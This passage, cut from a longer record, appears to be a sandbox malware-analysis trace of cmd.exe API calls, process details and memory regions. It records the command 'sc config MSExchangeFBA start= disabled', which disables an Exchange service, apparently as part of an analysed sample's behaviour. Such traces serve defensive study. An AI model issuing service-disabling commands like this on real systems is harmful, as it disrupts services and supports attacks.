lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.211] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0130.211] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0130.211] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0130.211] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0130.211] _wcsicmp (_String1="sc", _String2=")") returned 74 [0130.211] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0130.211] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0130.212] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0130.212] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0130.212] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0130.212] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0130.212] GetConsoleTitleW (in: lpConsoleTitle=0x4f9f4a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.213] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0130.213] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0130.213] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0130.213] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0130.213] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0130.213] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0130.213] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0130.213] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0130.213] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0130.213] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0130.213] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0130.213] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0130.213] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0130.213] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0130.213] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0130.213] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0130.213] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0130.213] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0130.213] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0130.213] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0130.213] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0130.213] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0130.213] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0130.213] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0130.213] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0130.213] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0130.213] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0130.213] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0130.213] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0130.213] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0130.213] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0130.213] _wcsicmp (_String1="sc", _String2="START") returned -17 [0130.213] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0130.213] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0130.213] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0130.213] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0130.213] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0130.213] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0130.213] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0130.213] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0130.213] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0130.213] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0130.213] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0130.213] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0130.214] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0130.214] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0130.214] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0130.214] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0130.214] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0130.214] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0130.214] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0130.214] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0130.214] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0130.214] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0130.214] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0130.214] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0130.214] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0130.214] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0130.214] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0130.214] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0130.214] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0130.214] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0130.214] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0130.214] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0130.214] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0130.214] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0130.214] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0130.214] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0130.214] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0130.214] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0130.214] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0130.214] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0130.214] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0130.214] _wcsicmp (_String1="sc", _String2="START") returned -17 [0130.214] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0130.214] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0130.214] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0130.214] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0130.214] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0130.214] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0130.214] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0130.214] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0130.214] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0130.214] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0130.214] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0130.214] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0130.214] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0130.214] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0130.215] SetErrorMode (uMode=0x0) returned 0x0 [0130.215] SetErrorMode (uMode=0x1) returned 0x0 [0130.215] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x51d05d0, lpFilePart=0x4f9efb4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4f9efb4*="Desktop") returned 0x1d [0130.215] SetErrorMode (uMode=0x0) returned 0x1 [0130.215] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0130.215] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0130.222] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0130.222] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0130.222] GetConsoleTitleW (in: lpConsoleTitle=0x4f9f234, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.222] InitializeProcThreadAttributeList (in: lpAttributeList=0x4f9f160, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4f9f144 | out: lpAttributeList=0x4f9f160, lpSize=0x4f9f144) returned 1 [0130.222] UpdateProcThreadAttribute (in: lpAttributeList=0x4f9f160, dwFlags=0x0, Attribute=0x60001, lpValue=0x4f9f14c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4f9f160, lpPreviousValue=0x0) returned 1 [0130.222] GetStartupInfoW (in: lpStartupInfo=0x4f9f198 | out: lpStartupInfo=0x4f9f198*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0130.223] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0130.223] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0130.224] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSExchangeFBA start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4f9f0e8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSExchangeFBA start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4f9f134 | out: lpCommandLine="sc config MSExchangeFBA start= disabled", lpProcessInformation=0x4f9f134*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x930, dwThreadId=0x954)) returned 1 [0130.230] CloseHandle (hObject=0xa4) returned 1 [0130.230] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0130.230] GetEnvironmentStringsW () returned 0x51d9f00* [0130.230] FreeEnvironmentStringsA (penv="=") returned 1 [0130.230] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0130.334] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4f9f0cc | out: lpExitCode=0x4f9f0cc*=0x424) returned 1 [0130.334] CloseHandle (hObject=0xa8) returned 1 [0130.334] _vsnwprintf (in: _Buffer=0x4f9f1b4, _BufferCount=0x13, _Format="%08X", _ArgList=0x4f9f0d4 | out: _Buffer="00000424") returned 8 [0130.334] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0130.334] GetEnvironmentStringsW () returned 0x51db378* [0130.334] FreeEnvironmentStringsA (penv="=") returned 1 [0130.334] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0130.334] GetEnvironmentStringsW () returned 0x51db378* [0130.334] FreeEnvironmentStringsA (penv="=") returned 1 [0130.334] DeleteProcThreadAttributeList (in: lpAttributeList=0x4f9f160 | out: lpAttributeList=0x4f9f160) [0130.334] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.334] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0130.335] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.335] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0130.335] _get_osfhandle (_FileHandle=0) returned 0x38 [0130.335] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0130.335] SetConsoleInputExeNameW () returned 0x1 [0130.335] GetConsoleOutputCP () returned 0x1b5 [0130.335] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0130.335] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.336] exit (_Code=1060) Thread: id = 457 os_tid = 0x948 Process: id = "129" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x63239000" os_pid = "0x52c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "128" os_parent_pid = "0x560" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7206 start_va = 0x7f3ca000 end_va = 0x7f3cafff entry_point = 0x0 region_type = private name = "private_0x000000007f3ca000" filename = "" Region: id = 7207 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7208 start_va = 0x695d2a0000 end_va = 0x695d2bffff entry_point = 0x0 region_type = private name = "private_0x000000695d2a0000" filename = "" Region: id = 7209 start_va = 0x695d2c0000 end_va = 0x695d2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000695d2c0000" filename = "" Region: id = 7210 start_va = 0x695d2e0000 end_va = 0x695d31ffff entry_point = 0x0 region_type = private name = "private_0x000000695d2e0000" filename = "" Region: id = 7211 start_va = 0x7df5ffd60000 end_va = 0x7ff5ffd5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffd60000" filename = "" Region: id = 7212 start_va = 0x7ff6c4310000 end_va = 0x7ff6c4332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4310000" filename = "" Region: id = 7213 start_va = 0x7ff6c433d000 end_va = 0x7ff6c433efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c433d000" filename = "" Region: id = 7214 start_va = 0x7ff6c433f000 end_va = 0x7ff6c433ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c433f000" filename = "" Region: id = 7215 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 7216 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7217 start_va = 0x695d2a0000 end_va = 0x695d2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000695d2a0000" filename = "" Region: id = 7218 start_va = 0x695d2b0000 end_va = 0x695d2b6fff entry_point = 0x0 region_type = private name = "private_0x000000695d2b0000" filename = "" Region: id = 7219 start_va = 0x695d320000 end_va = 0x695d3ddfff entry_point = 0x695d320000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7220 start_va = 0x695d3e0000 end_va = 0x695d41ffff entry_point = 0x0 region_type = private name = "private_0x000000695d3e0000" filename = "" Region: id = 7221 start_va = 0x695d420000 end_va = 0x695d420fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000695d420000" filename = "" Region: id = 7222 start_va = 0x695d430000 end_va = 0x695d436fff entry_point = 0x0 region_type = private name = "private_0x000000695d430000" filename = "" Region: id = 7223 start_va = 0x695d440000 end_va = 0x695d440fff entry_point = 0x0 region_type = private name = "private_0x000000695d440000" filename = "" Region: id = 7224 start_va = 0x695d450000 end_va = 0x695d450fff entry_point = 0x0 region_type = private name = "private_0x000000695d450000" filename = "" Region: id = 7225 start_va = 0x695d460000 end_va = 0x695d55ffff entry_point = 0x0 region_type = private name = "private_0x000000695d460000" filename = "" Region: id = 7226 start_va = 0x695d560000 end_va = 0x695d6e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000695d560000" filename = "" Region: id = 7227 start_va = 0x695d750000 end_va = 0x695d75ffff entry_point = 0x0 region_type = private name = "private_0x000000695d750000" filename = "" Region: id = 7228 start_va = 0x695d760000 end_va = 0x695d8e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000695d760000" filename = "" Region: id = 7229 start_va = 0x695d8f0000 end_va = 0x695eceffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000695d8f0000" filename = "" Region: id = 7230 start_va = 0x7ff6c4210000 end_va = 0x7ff6c430ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4210000" filename = "" Region: id = 7231 start_va = 0x7ff6c433b000 end_va = 0x7ff6c433cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c433b000" filename = "" Region: id = 7232 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 7233 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 7234 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7235 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7236 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 7237 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7238 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7239 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7240 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7241 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7242 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7243 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7244 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7245 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 454 os_tid = 0x854 Thread: id = 455 os_tid = 0x910 Thread: id = 456 os_tid = 0x928 Process: id = "130" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x42735000" os_pid = "0x930" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "128" os_parent_pid = "0x560" cmd_line = "sc config MSExchangeFBA start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7259 start_va = 0x330000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 7260 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 7261 start_va = 0x360000 end_va = 0x373fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 7262 start_va = 0x380000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 7263 start_va = 0x3c0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 7264 start_va = 0x400000 end_va = 0x403fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7265 start_va = 0x410000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 7266 start_va = 0x420000 end_va = 0x421fff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 7267 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 7268 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 7269 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7270 start_va = 0x7f480000 end_va = 0x7f4a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f480000" filename = "" Region: id = 7271 start_va = 0x7f4a5000 end_va = 0x7f4a5fff entry_point = 0x0 region_type = private name = "private_0x000000007f4a5000" filename = "" Region: id = 7272 start_va = 0x7f4ac000 end_va = 0x7f4aefff entry_point = 0x0 region_type = private name = "private_0x000000007f4ac000" filename = "" Region: id = 7273 start_va = 0x7f4af000 end_va = 0x7f4affff entry_point = 0x0 region_type = private name = "private_0x000000007f4af000" filename = "" Region: id = 7274 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7275 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7276 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 7277 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7278 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 7279 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 7280 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = 